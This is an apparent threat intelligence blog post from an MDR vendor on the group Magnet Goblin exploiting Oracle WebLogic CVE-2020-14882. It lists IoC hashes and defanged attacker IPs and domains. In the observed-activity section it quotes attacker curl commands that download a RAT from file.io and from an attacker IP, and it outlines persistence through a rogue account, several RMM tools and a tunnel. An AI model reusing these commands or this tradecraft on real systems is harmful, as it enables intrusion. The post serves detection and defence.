EXPEL BLOG

MDR insights: defense against persistent threats and Oracle WebLogic CVE-2020-14882

· 8 MIN READ · AARON WALTON · NOV 12, 2024 · TAGS: Alert / Get technical / Threat hunting / vulnerability prioritization

TL;DR

  • A threat actor known for targeting vulnerabilities is currently targeting CVE-2020-14882 in Oracle WebLogic
  • This threat actor is financially motivated and is notorious for selling network access to ransomware gangs
  • If you use Oracle WebLogic, we recommend patching and keeping it up to date

In September of 2024, we observed multiple instances of successful exploitation of Oracle WebLogic. These events occurred against multiple customers and appear to have leveraged the same CVE-2020-14882 vulnerability each time.

Based on our observations, each incident was the result of a single criminal group targeting servers. Checkpoint tracks this threat actor as Magnet Goblin. We are sharing this report to provide public information for continued awareness and tracking of this threat actor, and we want to ensure organizations (you!) can continue to secure your environment.

Oracle WebLogic vulnerability meets Magnet Goblin

In 2020, a critical vulnerability was identified in Oracle WebLogic (CVE-2020-14882). WebLogic is an application for hosting web apps—primarily eCommerce sites. However, researchers found that the service had a critical vulnerability that could be exploited with as little as a single web request. 

That single web request would allow an attacker to perform a path traversal attack, allowing them to execute arbitrary code on the server. Severe vulnerabilities like this are frequently of interest to attackers as they can provide an easy means to access a network.

Magnet Goblin is one of those interested crime groups. This group is known as an initial access broker (IAB). An IAB gains access to networks and then sells that access to other bad actors. Magnet Goblin has been known to work with ransomware gangs, like the Cactus Ransomware gang

A critical vulnerability like CVE-2020-14882 is a valuable vulnerability to an IAB like Magnet Goblin. If a bad actor understands how to exploit a vulnerability like this, then they can use it to compromise multiple networks, and make a pretty penny. And from our observation, this appears to be the case with this CVE.

Based on public reporting, Magnet Goblin has regularly targeted several critical vulnerabilities in the past few years. They’ve also been observed exploiting similar vulnerabilities in QlikSense (CVE-2023-41267, CVE-2023-41265, and CVE-2023-48365), Ivanti Connect Secure VPN (CVE-2023-46805 and CVE-2024-21887), and Magneto (CVE-2022-24086). 

What we’ve seen

As mentioned previously, CVE-2020-14882 allows an actor to execute arbitrary code. In Magnet Goblin’s attacks, they execute the command “/bin/sh curl -k -o /tmp/nix hxxps://file[.]io/slzUjFaS9d94”. This command uses `curl` to retrieve a file from file[.]io and write it to the `tmp` directory as “nix”. In instances where the threat actor failed to pull the file from file[.]io, they used a SimpleHTTP server on their own systems, which looks like this: “/bin/sh -c curl -o /tmp/nix http://91.92.251[.]175:8383/nixrat”. 

The attacker then uses these commands to pull their preferred tools onto the host because the vulnerability allows an attacker to execute arbitrary commands, but the functionality is limited. So, they are required to pull down additional tools to expand their access. Magnet Goblin uses the CVE to pull down a remote access tool (RAT) known as the NerBian RAT. This is their preferred tool they’ve used for several years, based on public reporting. 

For an IAB like Magnet Goblin, the most important thing is to maintain network access. After deploying the NerBian RAT, they create a user account for themselves named `sqladmin`. This account is then used to connect to other machines and deploy more RATs—including remote monitoring and management (RMM) tools—within the environment to fly under the radar. The bad actor often relies on commercial or open-source tools to avoid detection. In this instance, they deployed:

  • Panda Security Remote Control
  • SimpleHelp
  • N-Able Take Control
  • Level IO Remote Access Client

IABs deploy multiple RATs and RMM tools to ensure they retain network access no matter what. If one is blocked or removed, they can rely on the others. They often use commercial or open source tools, with the expectation that they’ll have lower detection rates.

Magnet Goblin will also deploy a Ligolo tunnel. The Ligolo tunnel is used to hide the attacker’s access by routing it through a VPN. Thankfully, in the incidents we observed, the attacker didn’t get the chance to perform activity beyond deploying the RATs because their activity was identified and stopped by our SOC. 

Ties to Magnet Goblin

Based on the tactics we identified in our customers’ environments, it appeared that Magnet Goblin was the bad actor present. 

First, the actor appeared to consistently use Limenet infrastructure. In December 2023, eSentire reported a threat actor using the same IP address (91.92.251.175) in a similar incident to host a PowerShell script. According to their reporting, the threat actor also used several RATs for persistence, including Level IO Remote Access Client. In that incident, the actor gained access via a Qlik Sense vulnerability (CVE-2023-41266, CVE-2023-41265, or CVE-2023-48365). 

The infrastructure the attacker used, Limenet, is a virtual private server provider that promises “complete anonymity,” according to their website. In practical terms, Limenet maintains minimal logs and information about their customers, so the service is ripe for abuse from IAB groups (like Magnet Goblin).

In both the incident reported by eSentire and the incidents we observed, the threat actor we  leveraged `requestcatcher.com`. This service is an out-of-band application security testing (OAST) tool that lets users monitor their own web traffic—which the bad actor likely used to confirm successful web exploitation. Over the years, the attacker seems to consistently employ an OAST tool—and often the same tool—to validate their attacks.

Additionally, the NerBian RAT has historically been associated with Magnet Goblin, and may even be a custom malware of theirs. Their use of this RAT has been consistently reported over the last few years. DarkTrace reported that an attacker downloaded it from Limenet infrastructure and, in the incident we observed, the malware also had a hard-coded command-and-control server on Limenet infrastructure.

All of this evidence made us confident that we were dealing with Magnet Goblin. 

Example indicators of compromise (IoCs)

The following table contains file hashes for the files that we observed. Like many RMM or RATs, the files may only be malicious if those tools aren’t expected in your environment. 

File name SHA256 hash Context
nix 19e0aab36e15ddb57e684748ac73dbced7d08e35c5950fe53a3b4011cba1f7ac NerBian RAT
28wy.exe 0798af37e50918997debfaf77bd8d657532bb0a6153dc812d6fcee7c999a3c17 Unknown binary deployed by attacker
28wy.exe f9ea148faf6ffff9044d1b3b8c2f98882134890b0e4e17eb0518b9a1b013238a Unknown binary deployed by attacker
agent.exe 62b96e1b703f03e134085caa15942765b485417c6f99a2046d1ed7cfacc4aac4 Ligolo Tunnel
ehorus_agent.exe 7f4cc58b690d658d6528485637a9170e5b791630ebfd4a644119f02004f58a30 Panda Remote Control Agent
ehorus_cmd.exe a5b1c55fad336a74aa41c5b7075075d28c26df4fc0c43732f2e53123cc7e56ef Panda Remote Control Agent
ehorus_cmd.exe a5b1c55fad336a74aa41c5b7075075d28c26df4fc0c43732f2e53123cc7e56ef Panda Remote Control Agent
ehorus_display.exe 196a87a187e7969cc2ccdc713e7d030ab77feafc9b53619f1a4bfb4fda002f5a Panda Remote Control Agent
ehorus_launcher.exe 2e64bf8ca66e4363240e10dd8c85eabbf104d08aba60b307435ff5760d425a92 Panda Remote Control Agent
ehorus_uit.exe 247085a59535d4f68d6af35bc54a017e4f479f17ea96f20384ea0aeeb7ef3040 Panda Remote Control Agent
winpty-agent.exe 1438bb19667d54e7df9cd2edae0b879ab936e2a9533ef82069b019dfd3b8b661 Panda Remote Control Agent
winpty-agent.exe 1a896301784758c59722d1e61a0dd20a8269c460ed739277aeb4c98ca11b28a4 Panda Remote Control Agent
level.exe 54d737c9cd2c064ba462f6d406cdb0edecc6fd2ef72cb719c25100eda81f4044 Level Remote Access Client
osqueryi.exe 824808240cf683202a6c0592c9eb8eac9deb85e8f4c5b22d9d43472dfd8bfa78 OSQuery Daemon Shell—used by Level Remote Access client
FileCacheServiceAgent.exe ff7cc1a8e79e193a9d9d083afea4b06a98f48647b9d0e750d7dae4c657a77e93 N-Able FileCacheServiceAgent
fmplugin.exe 14b13a47e353e3c485bd57a62b85ed7e9affa3f5f1e7529efdc72e092939d894 N-Able fm plugin
assetscan.exe a9bce9eeb0b048f8a8b17b493cc8c6cdf581faeb42af46f0179119a34c0bdbac N-Able assetscan.exe
MSP_Connect.exe 21fdf6e9ed0fdc0c4ec70779c0be1007185bd5ec2c48a9cea3a73970ae29fe6d N-Able Take Control Agent
NetworkManagementInstall.exe 7e47226289726b16c27782bf35a07a3d020afe314957f1648f98a51091f88acd N-Able Advanced Monitoring Agent Network Management
PME.Agent.exe 207fe3368b801c0ca77864d03b29662b391d85b8655654a3ff91fea5830ff0b N-Able PME.Agen
PMESetup.exe d772e491c1f9ceded3042b3c5c7e1a2f9463746dc8adaaf382315239d744960c N-Able Patch Management Service Controller
winagent.exe 7b1fd98dd50b1474a8cbafd3ba885d21841bd9293fdcd3443c5fb299c7a85c38 N-Able Advanced Monitoring Agent
RequestHandlerAgentSetup.exe 32faa94eaf95670a8bf88361712c12392efe93e05d6bf611e86ce07ad1d14ee7 N-Able Request Handler Agent
Remote Access.exe 6f96b31495c07f54e174dcf990dd489e1d5f1863ffd52c026300d4115a9cad37 SimpleHelp JWrapper Remote Access Client
Remote Access.exe 78137fe94fd5450b2f2614af2b646f5d64da89b124fbbe8cb842d103ed14d729 SimpleHelp Remote Access Client
Remote Access.exe 78137fe94fd5450b2f2614af2b646f5d64da89b124fbbe8cb842d103ed14d729 SimpleHelp Remote Access Client
RemoteAccessLauncher.exe 6f96b31495c07f54e174dcf990dd489e1d5f1863ffd52c026300d4115a9cad37 SimpleHelp Remote Access Client
RemoteAccessWinLauncher.exe 78137fe94fd5450b2f2614af2b646f5d64da89b124fbbe8cb842d103ed14d729 SimpleHelp Remote Access Client
elev_win.exe 438ba43227682d7f46d9da5a739331ceb793ecf2038b20d5f0c9ff15eae8940b SimpleHelp JWrapper Remote Access Client
remoteaccess-jar-with-depedencies.jar bfb6dae17c901643a1888088e3971f3e85b2bb19a41d9978bcfa42910545be5a Simple Help Remote Access JAR File
shcad.exe 733aefd24574f9b25bd8cdc20246c6c5a37a95449add69f40583f6939de56ea9 SimpleHelp Binary
StopSimpleGatewayService.exe 78137fe94fd5450b2f2614af2b646f5d64da89b124fbbe8cb842d103ed14d729 SimpleHelp Remote Access Client
windowslauncher.exe 6f96b31495c07f54e174dcf990dd489e1d5f1863ffd52c026300d4115a9cad37 SimpleHelp Remote Access Client
winpty-agent64.exe 586a2d7d3092b364db3cbb5a7dbc83cf7ef233338c4172c1bae6587f8b374cab SimpleHelp PTY Agent
cadasuser.exe 57fb030e4ed08aef7eb505ab4c071cba98c4dc92166a3840e2a121dc75abedfe SimpleHelp Utility

 

The following table contains IP address and domains that were identified to be part of the malicious activity from the incidents that we investigated. 

IP/Domain Context
91.92.251[.]175  Websever hosting attacker payloads. 
91.92.249[.]195 IP address hard-coded into NerBian RAT binary.
27-96-43-135[.]ipq[.]jp VPN domain hosted at IPQ.JP leveraged by attacker to download payload.
bashupload[.]com A short-lived file hosting service intended for single-use commands. Was weaponized in attack to host NerBian RAT.
file[.]io A file hosting platform used by the attacker.
leprechaun[.]ehorus[.]com Management panel for Panda Remote Control.
mail[.]157-230-41-8[.]cprapid[.]com cPanel instance hosted in DigitalOcean, believed to be attacker-controlled.
157.230.41[.]8 IP address for cPanel instance hosted in Digital Ocean.
pruebas[.]pintacuario[.]mx Management domain used by SimpleHelp.
requestcatcher[.]com Out-of-band application security testing domain used to confirm successful exploitation.

 

Vulnerability prioritization is key for effective remediation

New vulnerabilities are found every day, but not all of them are interesting to attackers. It’s important to prioritize remediating exploited vulnerabilities over those that just exist. Expel provides this information as part of our vulnerability prioritization offering. And we utilize information from a customer’s network scans to understand what vulnerabilities are in an environment, so we can then recommend patching prioritization. Our prioritization recommendations are based on public and private information on what vulnerabilities attackers are targeting. This means that teams that we support can ensure they are patching or mitigating vulnerabilities that attackers are targeting quickly, without needing to do arduous research themselves.

Magnet Goblin’s track record helps create a concrete example of an attacker that prioritizes learning about and using critical vulnerabilities. Warning about these vulnerabilities isn’t just theoretical. There are real attackers who make a living out of targeting these vulnerabilities. It’s important to have an effective plan for mitigating risk around vulnerabilities when they’re identified because they can quickly become problems for your business.

It’s important to monitor and detect unexpected RMM tools. The website https://lolrmm.io/ is a good tool with a robust list of RMM tools that are often leveraged for abuse. This kind of list is useful in building detections or performing hunts for unauthorized RMM tools

If you have more questions on preventing or remediating similar CVEs, or want to learn more about our vulnerability prioritization or threat hunting offerings, you can reach out to us here